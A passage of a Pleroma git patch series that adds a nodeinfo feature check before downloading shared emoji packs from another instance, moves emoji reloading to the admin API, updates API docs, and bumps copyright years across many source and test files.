diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index a83f8af57..36ca2c804 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -153,64 +153,79 @@ def download_shared(conn, %{"name" => name}) do
from that instance, otherwise it will be downloaded from the fallback source, if there is one.
"""
def download_from(conn, %{"instance_address" => address, "pack_name" => name} = data) do
- full_pack =
- "#{address}/api/pleroma/emoji/packs/list"
+ shareable_packs_available =
+ "#{address}/nodeinfo/2.1.json"
|> Tesla.get!()
|> Map.get(:body)
|> Jason.decode!()
- |> Map.get(name)
+ |> Map.get("features")
+ |> Enum.member?("shareable_emoji_packs")
- pack_info_res =
- case full_pack["pack"] do
- %{"share-files" => true, "can-download" => true, "download-sha256" => sha} ->
- {:ok,
- %{
- sha: sha,
- uri: "#{address}/api/pleroma/emoji/packs/download_shared/#{name}"
- }}
+ if shareable_packs_available do
+ full_pack =
+ "#{address}/api/pleroma/emoji/packs/list"
+ |> Tesla.get!()
+ |> Map.get(:body)
+ |> Jason.decode!()
+ |> Map.get(name)
- %{"fallback-src" => src, "fallback-src-sha256" => sha} when is_binary(src) ->
- {:ok,
- %{
- sha: sha,
- uri: src,
- fallback: true
- }}
+ pack_info_res =
+ case full_pack["pack"] do
+ %{"share-files" => true, "can-download" => true, "download-sha256" => sha} ->
+ {:ok,
+ %{
+ sha: sha,
+ uri: "#{address}/api/pleroma/emoji/packs/download_shared/#{name}"
+ }}
- _ ->
- {:error, "The pack was not set as shared and there is no fallback src to download from"}
+ %{"fallback-src" => src, "fallback-src-sha256" => sha} when is_binary(src) ->
+ {:ok,
+ %{
+ sha: sha,
+ uri: src,
+ fallback: true
+ }}
+
+ _ ->
+ {:error,
+ "The pack was not set as shared and there is no fallback src to download from"}
+ end
+
+ with {:ok, %{sha: sha, uri: uri} = pinfo} <- pack_info_res,
+ %{body: emoji_archive} <- Tesla.get!(uri),
+ {_, true} <- {:checksum, Base.decode16!(sha) == :crypto.hash(:sha256, emoji_archive)} do
+ local_name = data["as"] || name
+ pack_dir = Path.join(@emoji_dir_path, local_name)
+ File.mkdir_p!(pack_dir)
+
+ files = Enum.map(full_pack["files"], fn {_, path} -> to_charlist(path) end)
+ # Fallback cannot contain a pack.json file
+ files = if pinfo[:fallback], do: files, else: ['pack.json'] ++ files
+
+ {:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
+
+ # Fallback can't contain a pack.json file, since that would cause the fallback-src-sha256
+ # in it to depend on itself
+ if pinfo[:fallback] do
+ pack_file_path = Path.join(pack_dir, "pack.json")
+
+ File.write!(pack_file_path, Jason.encode!(full_pack, pretty: true))
+ end
+
+ json(conn, "ok")
+ else
+ {:error, e} ->
+ conn |> put_status(:internal_server_error) |> json(%{error: e})
+
+ {:checksum, _} ->
+ conn
+ |> put_status(:internal_server_error)
+ |> json(%{error: "SHA256 for the pack doesn't match the one sent by the server"})
end
-
- with {:ok, %{sha: sha, uri: uri} = pinfo} <- pack_info_res,
- %{body: emoji_archive} <- Tesla.get!(uri),
- {_, true} <- {:checksum, Base.decode16!(sha) == :crypto.hash(:sha256, emoji_archive)} do
- local_name = data["as"] || name
- pack_dir = Path.join(@emoji_dir_path, local_name)
- File.mkdir_p!(pack_dir)
-
- files = Enum.map(full_pack["files"], fn {_, path} -> to_charlist(path) end)
- # Fallback cannot contain a pack.json file
- files = if pinfo[:fallback], do: files, else: ['pack.json'] ++ files
-
- {:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
-
- # Fallback can't contain a pack.json file, since that would cause the fallback-src-sha256
- # in it to depend on itself
- if pinfo[:fallback] do
- pack_file_path = Path.join(pack_dir, "pack.json")
-
- File.write!(pack_file_path, Jason.encode!(full_pack, pretty: true))
- end
-
- json(conn, "ok")
else
- {:error, e} ->
- conn |> put_status(:internal_server_error) |> json(%{error: e})
-
- {:checksum, _} ->
- conn
- |> put_status(:internal_server_error)
- |> json(%{error: "SHA256 for the pack doesn't match the one sent by the server"})
+ conn
+ |> put_status(:internal_server_error)
+ |> json(%{error: "The requested instance does not support sharing emoji packs"})
end
end
diff --git a/lib/pleroma/web/nodeinfo/nodeinfo_controller.ex b/lib/pleroma/web/nodeinfo/nodeinfo_controller.ex
index ee14cfd6b..192984242 100644
--- a/lib/pleroma/web/nodeinfo/nodeinfo_controller.ex
+++ b/lib/pleroma/web/nodeinfo/nodeinfo_controller.ex
@@ -57,6 +57,7 @@ def raw_nodeinfo do
"mastodon_api_streaming",
"polls",
"pleroma_explicit_addressing",
+ "shareable_emoji_packs",
if Config.get([:media_proxy, :enabled]) do
"media_proxy"
end,
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 38d11cdce..1af4d3720 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -54,6 +54,12 @@ test "downloading shared & unshared packs from another instance via download_fro
end)
mock(fn
+ %{method: :get, url: "https://old-instance/nodeinfo/2.1.json"} ->
+ json(%{features: []})
+
+ %{method: :get, url: "https://example.com/nodeinfo/2.1.json"} ->
+ json(%{features: ["shareable_emoji_packs"]})
+
%{
method: :get,
url: "https://example.com/api/pleroma/emoji/packs/list"
@@ -87,6 +93,22 @@ test "downloading shared & unshared packs from another instance via download_fro
conn = build_conn() |> assign(:user, admin)
+ assert (conn
+ |> put_req_header("content-type", "application/json")
+ |> post(
+ emoji_api_path(
+ conn,
+ :download_from
+ ),
+ %{
+ instance_address: "https://old-instance",
+ pack_name: "test_pack",
+ as: "test_pack2"
+ }
+ |> Jason.encode!()
+ )
+ |> json_response(500))["error"] =~ "does not support"
+
assert conn
|> put_req_header("content-type", "application/json")
|> post(
From 7680aec17d6690ccf7383354572456c2118a8750 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Thu, 12 Sep 2019 00:00:28 +0300
Subject: [PATCH 171/272] Move emoji api to pleroma api dir
---
.../web/{emoji_api => pleroma_api}/emoji_api_controller.ex | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename lib/pleroma/web/{emoji_api => pleroma_api}/emoji_api_controller.ex (100%)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
similarity index 100%
rename from lib/pleroma/web/emoji_api/emoji_api_controller.ex
rename to lib/pleroma/web/pleroma_api/emoji_api_controller.ex
From d51e5e447ee944e77646b15a7aabc0214e99c351 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Thu, 12 Sep 2019 20:38:57 +0300
Subject: [PATCH 172/272] Move emoji reloading to admin api
---
docs/api/admin_api.md | 7 +++++++
docs/api/pleroma_api.md | 8 --------
lib/pleroma/web/admin_api/admin_api_controller.ex | 6 ++++++
lib/pleroma/web/pleroma_api/emoji_api_controller.ex | 6 ------
lib/pleroma/web/router.ex | 8 ++------
5 files changed, 15 insertions(+), 20 deletions(-)
diff --git a/docs/api/admin_api.md b/docs/api/admin_api.md
index 7637fa0d4..0377ea655 100644
--- a/docs/api/admin_api.md
+++ b/docs/api/admin_api.md
@@ -733,3 +733,10 @@ Compile time settings (need instance reboot):
}
]
```
+
+## `POST /api/pleroma/admin/reload_emoji`
+### Reload the instance's custom emoji
+* Method `POST`
+* Authentication: required
+* Params: None
+* Response: JSON, "ok" and 200 status
diff --git a/docs/api/pleroma_api.md b/docs/api/pleroma_api.md
index a7e7fbe25..05a4e6fcc 100644
--- a/docs/api/pleroma_api.md
+++ b/docs/api/pleroma_api.md
@@ -366,14 +366,6 @@ The status posting endpoint takes an additional parameter, `in_reply_to_conversa
* `recipients`: A list of ids of users that should receive posts to this conversation. This will replace the current list of recipients, so submit the full list. The owner of owner of the conversation will always be part of the set of recipients, though.
* Response: JSON, statuses (200 - healthy, 503 unhealthy)
-
-## `POST /api/pleroma/emoji/reload`
-### Reload the instance's custom emoji
-* Method `POST`
-* Authentication: required
-* Params: None
-* Response: JSON, "ok" and 200 status
-
## `PUT /api/pleroma/emoji/packs/:name`
### Creates an empty custom emoji pack
* Method `PUT`
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 8a8091daa..4d4e862dd 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -599,6 +599,12 @@ def config_update(conn, %{"configs" => configs}) do
|> render("index.json", %{configs: updated})
end
+ def reload_emoji(conn, _params) do
+ Pleroma.Emoji.reload()
+
+ conn |> json("ok")
+ end
+
def errors(conn, {:error, :not_found}) do
conn
|> put_status(:not_found)
diff --git a/lib/pleroma/web/pleroma_api/emoji_api_controller.ex b/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
index 36ca2c804..bc1639095 100644
--- a/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
@@ -3,12 +3,6 @@ defmodule Pleroma.Web.PleromaAPI.EmojiAPIController do
require Logger
- def reload(conn, _params) do
- Pleroma.Emoji.reload()
-
- conn |> json("ok")
- end
-
@emoji_dir_path Path.join(
Pleroma.Config.get!([:instance, :static_dir]),
"emoji"
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 715e4ba68..71ef382c5 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -205,15 +205,11 @@ defmodule Pleroma.Web.Router do
get("/config/migrate_from_db", AdminAPIController, :migrate_from_db)
get("/moderation_log", AdminAPIController, :list_log)
+
+ post("/reload_emoji", AdminAPIController, :reload_emoji)
end
scope "/api/pleroma/emoji", Pleroma.Web.PleromaAPI do
- scope [] do
- pipe_through([:admin_api, :oauth_write])
-
- post("/reload", EmojiAPIController, :reload)
- end
-
scope "/packs" do
# Modifying packs
pipe_through([:admin_api, :oauth_write])
From 8aed05ac1518a10fb30532429984e02a05180ec3 Mon Sep 17 00:00:00 2001
From: vaartis
Date: Fri, 13 Sep 2019 12:32:23 +0000
Subject: [PATCH 173/272] Apply suggestion to docs/api/pleroma_api.md
---
docs/api/pleroma_api.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/api/pleroma_api.md b/docs/api/pleroma_api.md
index 05a4e6fcc..e76bf0caf 100644
--- a/docs/api/pleroma_api.md
+++ b/docs/api/pleroma_api.md
@@ -417,7 +417,7 @@ The status posting endpoint takes an additional parameter, `in_reply_to_conversa
errors downloading the pack
## `GET /api/pleroma/emoji/packs/:name/download_shared`
-### Requests the instance to download the pack from another instance
+### Requests a local pack from the instance
* Method `GET`
* Authentication: not requires
* Params: None
From 43022c347f9001d9cb8de976dd521a1e5f1c1318 Mon Sep 17 00:00:00 2001
From: vaartis
Date: Fri, 13 Sep 2019 12:32:40 +0000
Subject: [PATCH 174/272] Apply suggestion to docs/api/pleroma_api.md
---
docs/api/pleroma_api.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/api/pleroma_api.md b/docs/api/pleroma_api.md
index e76bf0caf..faf6e3acd 100644
--- a/docs/api/pleroma_api.md
+++ b/docs/api/pleroma_api.md
@@ -419,7 +419,7 @@ The status posting endpoint takes an additional parameter, `in_reply_to_conversa
## `GET /api/pleroma/emoji/packs/:name/download_shared`
### Requests a local pack from the instance
* Method `GET`
-* Authentication: not requires
+* Authentication: not required
* Params: None
* Response: the archive of the pack with a 200 status code, 403 if the pack is not set as shared,
404 if the pack does not exist
From 86795d5ac2604e08654b872927678d3e05a68e85 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Fri, 13 Sep 2019 21:00:28 +0300
Subject: [PATCH 175/272] Document emoji pack listing in the api docs
---
docs/api/pleroma_api.md | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/docs/api/pleroma_api.md b/docs/api/pleroma_api.md
index faf6e3acd..a469ddfbf 100644
--- a/docs/api/pleroma_api.md
+++ b/docs/api/pleroma_api.md
@@ -366,6 +366,13 @@ The status posting endpoint takes an additional parameter, `in_reply_to_conversa
* `recipients`: A list of ids of users that should receive posts to this conversation. This will replace the current list of recipients, so submit the full list. The owner of owner of the conversation will always be part of the set of recipients, though.
* Response: JSON, statuses (200 - healthy, 503 unhealthy)
+## `GET /api/pleroma/emoji/packs`
+### Lists the custom emoji packs on the server
+* Method `GET`
+* Authentication: not required
+* Params: None
+* Response: JSON, "ok" and 200 status and the JSON hashmap of "pack name" to "pack contents"
+
## `PUT /api/pleroma/emoji/packs/:name`
### Creates an empty custom emoji pack
* Method `PUT`
From a1325d5fd9b540017cbffbb73db85ee9fa9f12d0 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 18 Sep 2019 18:09:57 +0300
Subject: [PATCH 176/272] Change path from nodeinfo to metadata->features
---
lib/pleroma/web/pleroma_api/emoji_api_controller.ex | 2 +-
test/web/emoji_api_controller_test.exs | 4 ++--
2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/web/pleroma_api/emoji_api_controller.ex b/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
index bc1639095..391c317e7 100644
--- a/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
@@ -152,7 +152,7 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
|> Tesla.get!()
|> Map.get(:body)
|> Jason.decode!()
- |> Map.get("features")
+ |> get_in(["metadata", "features"])
|> Enum.member?("shareable_emoji_packs")
if shareable_packs_available do
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 1af4d3720..297dc092f 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -55,10 +55,10 @@ test "downloading shared & unshared packs from another instance via download_fro
mock(fn
%{method: :get, url: "https://old-instance/nodeinfo/2.1.json"} ->
- json(%{features: []})
+ json(%{metadata: %{features: []}})
%{method: :get, url: "https://example.com/nodeinfo/2.1.json"} ->
- json(%{features: ["shareable_emoji_packs"]})
+ json(%{metadata: %{features: ["shareable_emoji_packs"]}})
%{
method: :get,
From b585134c9092b49e7b5c24e04d6d6315d45dd0a2 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 18 Sep 2019 19:48:25 +0300
Subject: [PATCH 177/272] Get the nodeinfo address from the well-known
---
lib/pleroma/web/pleroma_api/emoji_api_controller.ex | 8 +++++++-
test/web/emoji_api_controller_test.exs | 6 ++++++
2 files changed, 13 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/web/pleroma_api/emoji_api_controller.ex b/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
index 391c317e7..6beca426a 100644
--- a/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/pleroma_api/emoji_api_controller.ex
@@ -148,7 +148,13 @@ def download_shared(conn, %{"name" => name}) do
"""
def download_from(conn, %{"instance_address" => address, "pack_name" => name} = data) do
shareable_packs_available =
- "#{address}/nodeinfo/2.1.json"
+ "#{address}/.well-known/nodeinfo"
+ |> Tesla.get!()
+ |> Map.get(:body)
+ |> Jason.decode!()
+ |> List.last()
+ |> Map.get("href")
+ # Get the actual nodeinfo address and fetch it
|> Tesla.get!()
|> Map.get(:body)
|> Jason.decode!()
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 297dc092f..c5a553692 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -54,9 +54,15 @@ test "downloading shared & unshared packs from another instance via download_fro
end)
mock(fn
+ %{method: :get, url: "https://old-instance/.well-known/nodeinfo"} ->
+ json([%{href: "https://old-instance/nodeinfo/2.1.json"}])
+
%{method: :get, url: "https://old-instance/nodeinfo/2.1.json"} ->
json(%{metadata: %{features: []}})
+ %{method: :get, url: "https://example.com/.well-known/nodeinfo"} ->
+ json([%{href: "https://example.com/nodeinfo/2.1.json"}])
+
%{method: :get, url: "https://example.com/nodeinfo/2.1.json"} ->
json(%{metadata: %{features: ["shareable_emoji_packs"]}})
From c3856bed0c4c177c3e6716d06d615a928d95f69c Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Wed, 18 Sep 2019 23:17:15 +0200
Subject: [PATCH 178/272] docs/clients.md: Update source code urls
---
docs/clients.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/docs/clients.md b/docs/clients.md
index 9029361f8..6c6180f7a 100644
--- a/docs/clients.md
+++ b/docs/clients.md
@@ -39,7 +39,7 @@ Feel free to contact us to be added to this list!
### Nekonium
- Homepage: [F-Droid Repository](https://repo.gdgd.jp.net/), [Google Play](https://play.google.com/store/apps/details?id=com.apps.nekonium), [Amazon](https://www.amazon.co.jp/dp/B076FXPRBC/)
-- Source:
+- Source:
- Contact: [@lin@pleroma.gdgd.jp.net](https://pleroma.gdgd.jp.net/users/lin)
- Platforms: Android
- Features: Streaming Ready
@@ -67,7 +67,7 @@ Feel free to contact us to be added to this list!
## Alternative Web Interfaces
### Brutaldon
- Homepage:
-- Source Code:
+- Source Code:
- Contact: [@gcupc@glitch.social](https://glitch.social/users/gcupc)
- Features: No Streaming
From 447514dfa2759e3415399412e82bf772ff119e04 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Wed, 18 Sep 2019 23:20:54 +0200
Subject: [PATCH 179/272] Bump copyright years of files changed in 2019
Done via the following command:
git diff 1e6c102bfcfe0e4835a48f2483f2376f9bf86a20 --stat --name-only | cat - | xargs sed -i 's/2017-2018 Pleroma Authors/2017-2019 Pleroma Authors/'
---
lib/mix/pleroma.ex | 2 +-
lib/mix/tasks/pleroma/database.ex | 2 +-
lib/mix/tasks/pleroma/ecto/ecto.ex | 2 +-
lib/mix/tasks/pleroma/ecto/migrate.ex | 2 +-
lib/mix/tasks/pleroma/ecto/rollback.ex | 2 +-
lib/mix/tasks/pleroma/emoji.ex | 2 +-
lib/mix/tasks/pleroma/instance.ex | 2 +-
lib/mix/tasks/pleroma/relay.ex | 2 +-
lib/mix/tasks/pleroma/uploads.ex | 2 +-
lib/mix/tasks/pleroma/user.ex | 2 +-
lib/pleroma/activity/queries.ex | 2 +-
lib/pleroma/user/query.ex | 2 +-
lib/pleroma/web/oauth/token/clean_worker.ex | 2 +-
lib/pleroma/web/oauth/token/query.ex | 2 +-
test/activity_test.exs | 2 +-
test/captcha_test.exs | 2 +-
test/config_test.exs | 2 +-
test/daemons/activity_expiration_daemon_test.exs | 2 +-
test/daemons/scheduled_activity_daemon_test.exs | 2 +-
test/emails/admin_email_test.exs | 2 +-
test/emails/mailer_test.exs | 2 +-
test/emails/user_email_test.exs | 2 +-
test/formatter_test.exs | 2 +-
test/html_test.exs | 2 +-
test/integration/mastodon_websocket_test.exs | 2 +-
test/list_test.exs | 2 +-
test/notification_test.exs | 2 +-
test/object_test.exs | 2 +-
test/plugs/authentication_plug_test.exs | 2 +-
test/plugs/cache_control_test.exs | 2 +-
test/plugs/ensure_public_or_authenticated_plug_test.exs | 2 +-
test/plugs/http_security_plug_test.exs | 2 +-
test/plugs/http_signature_plug_test.exs | 2 +-
test/plugs/instance_static_test.exs | 2 +-
test/plugs/legacy_authentication_plug_test.exs | 2 +-
test/plugs/mapped_identity_to_signature_plug_test.exs | 2 +-
test/plugs/oauth_plug_test.exs | 2 +-
test/plugs/oauth_scopes_plug_test.exs | 2 +-
test/plugs/set_format_plug_test.exs | 2 +-
test/plugs/set_locale_plug_test.exs | 2 +-
test/plugs/uploaded_media_plug_test.exs | 2 +-
test/scheduled_activity_test.exs | 2 +-
test/support/captcha_mock.ex | 2 +-
test/support/conn_case.ex | 2 +-
test/support/data_case.ex | 2 +-
test/support/helpers.ex | 2 +-
test/support/http_request_mock.ex | 2 +-
test/support/mrf_module_mock.ex | 2 +-
test/support/oban_helpers.ex | 2 +-
test/support/web_push_http_client_mock.ex | 2 +-
test/tasks/ecto/migrate_test.exs | 2 +-
test/tasks/relay_test.exs | 2 +-
test/tasks/user_test.exs | 2 +-
test/test_helper.exs | 2 +-
test/upload_test.exs | 2 +-
test/user_search_test.exs | 2 +-
test/user_test.exs | 2 +-
test/web/activity_pub/activity_pub_controller_test.exs | 2 +-
test/web/activity_pub/relay_test.exs | 2 +-
test/web/activity_pub/transmogrifier/follow_handling_test.exs | 2 +-
test/web/activity_pub/transmogrifier_test.exs | 2 +-
test/web/admin_api/admin_api_controller_test.exs | 2 +-
test/web/admin_api/search_test.exs | 2 +-
test/web/common_api/common_api_utils_test.exs | 2 +-
test/web/federator_test.exs | 2 +-
test/web/instances/instance_test.exs | 2 +-
test/web/instances/instances_test.exs | 2 +-
test/web/mastodon_api/views/account_view_test.exs | 2 +-
test/web/mastodon_api/views/list_view_test.exs | 2 +-
test/web/mastodon_api/views/notification_view_test.exs | 2 +-
test/web/mastodon_api/views/push_subscription_view_test.exs | 2 +-
test/web/mastodon_api/views/scheduled_activity_view_test.exs | 2 +-
test/web/mastodon_api/views/status_view_test.exs | 2 +-
test/web/media_proxy/media_proxy_controller_test.exs | 2 +-
test/web/media_proxy/media_proxy_test.exs | 2 +-
test/web/node_info_test.exs | 2 +-
test/web/oauth/authorization_test.exs | 2 +-
test/web/oauth/oauth_controller_test.exs | 2 +-
test/web/oauth/token/utils_test.exs | 2 +-
test/web/oauth/token_test.exs | 2 +-
test/web/ostatus/activity_representer_test.exs | 2 +-
test/web/ostatus/feed_representer_test.exs | 2 +-
test/web/ostatus/ostatus_controller_test.exs | 2 +-
test/web/ostatus/ostatus_test.exs | 2 +-
test/web/plugs/federating_plug_test.exs | 2 +-
test/web/push/impl_test.exs | 2 +-
test/web/salmon/salmon_test.exs | 2 +-
test/web/streamer/streamer_test.exs | 2 +-
test/web/twitter_api/twitter_api_test.exs | 2 +-
test/web/uploader_controller_test.exs | 2 +-
test/web/views/error_view_test.exs | 2 +-
test/web/web_finger/web_finger_controller_test.exs | 2 +-
test/web/web_finger/web_finger_test.exs | 2 +-
test/web/websub/websub_controller_test.exs | 2 +-
test/web/websub/websub_test.exs | 2 +-
95 files changed, 95 insertions(+), 95 deletions(-)
diff --git a/lib/mix/pleroma.ex b/lib/mix/pleroma.ex
index 1b758ea33..faeb30e1d 100644
--- a/lib/mix/pleroma.ex
+++ b/lib/mix/pleroma.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Pleroma do
diff --git a/lib/mix/tasks/pleroma/database.ex b/lib/mix/tasks/pleroma/database.ex
index bcc2052d6..890a383df 100644
--- a/lib/mix/tasks/pleroma/database.ex
+++ b/lib/mix/tasks/pleroma/database.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.Database do
diff --git a/lib/mix/tasks/pleroma/ecto/ecto.ex b/lib/mix/tasks/pleroma/ecto/ecto.ex
index b66f63376..36808b93f 100644
--- a/lib/mix/tasks/pleroma/ecto/ecto.ex
+++ b/lib/mix/tasks/pleroma/ecto/ecto.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-onl
defmodule Mix.Tasks.Pleroma.Ecto do
diff --git a/lib/mix/tasks/pleroma/ecto/migrate.ex b/lib/mix/tasks/pleroma/ecto/migrate.ex
index 855c977f6..d87b6957d 100644
--- a/lib/mix/tasks/pleroma/ecto/migrate.ex
+++ b/lib/mix/tasks/pleroma/ecto/migrate.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-onl
defmodule Mix.Tasks.Pleroma.Ecto.Migrate do
diff --git a/lib/mix/tasks/pleroma/ecto/rollback.ex b/lib/mix/tasks/pleroma/ecto/rollback.ex
index 2ffb0901c..a1af73fa1 100644
--- a/lib/mix/tasks/pleroma/ecto/rollback.ex
+++ b/lib/mix/tasks/pleroma/ecto/rollback.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-onl
defmodule Mix.Tasks.Pleroma.Ecto.Rollback do
diff --git a/lib/mix/tasks/pleroma/emoji.ex b/lib/mix/tasks/pleroma/emoji.ex
index c2225af7d..238d8dcd9 100644
--- a/lib/mix/tasks/pleroma/emoji.ex
+++ b/lib/mix/tasks/pleroma/emoji.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.Emoji do
diff --git a/lib/mix/tasks/pleroma/instance.ex b/lib/mix/tasks/pleroma/instance.ex
index b9b1991c2..1a1634fe9 100644
--- a/lib/mix/tasks/pleroma/instance.ex
+++ b/lib/mix/tasks/pleroma/instance.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.Instance do
diff --git a/lib/mix/tasks/pleroma/relay.ex b/lib/mix/tasks/pleroma/relay.ex
index a738fae75..200721163 100644
--- a/lib/mix/tasks/pleroma/relay.ex
+++ b/lib/mix/tasks/pleroma/relay.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.Relay do
diff --git a/lib/mix/tasks/pleroma/uploads.ex b/lib/mix/tasks/pleroma/uploads.ex
index be45383ee..95392d81b 100644
--- a/lib/mix/tasks/pleroma/uploads.ex
+++ b/lib/mix/tasks/pleroma/uploads.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.Uploads do
diff --git a/lib/mix/tasks/pleroma/user.ex b/lib/mix/tasks/pleroma/user.ex
index a3f8bc945..eb0052144 100644
--- a/lib/mix/tasks/pleroma/user.ex
+++ b/lib/mix/tasks/pleroma/user.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.User do
diff --git a/lib/pleroma/activity/queries.ex b/lib/pleroma/activity/queries.ex
index 13fa33831..949f010a8 100644
--- a/lib/pleroma/activity/queries.ex
+++ b/lib/pleroma/activity/queries.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Activity.Queries do
diff --git a/lib/pleroma/user/query.ex b/lib/pleroma/user/query.ex
index f9bcc9e19..2baf016cf 100644
--- a/lib/pleroma/user/query.ex
+++ b/lib/pleroma/user/query.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.User.Query do
diff --git a/lib/pleroma/web/oauth/token/clean_worker.ex b/lib/pleroma/web/oauth/token/clean_worker.ex
index eb94bf86f..f639f9c6f 100644
--- a/lib/pleroma/web/oauth/token/clean_worker.ex
+++ b/lib/pleroma/web/oauth/token/clean_worker.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OAuth.Token.CleanWorker do
diff --git a/lib/pleroma/web/oauth/token/query.ex b/lib/pleroma/web/oauth/token/query.ex
index d92e1f071..9642103e6 100644
--- a/lib/pleroma/web/oauth/token/query.ex
+++ b/lib/pleroma/web/oauth/token/query.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OAuth.Token.Query do
diff --git a/test/activity_test.exs b/test/activity_test.exs
index 6512d84ac..95d9341c4 100644
--- a/test/activity_test.exs
+++ b/test/activity_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.ActivityTest do
diff --git a/test/captcha_test.exs b/test/captcha_test.exs
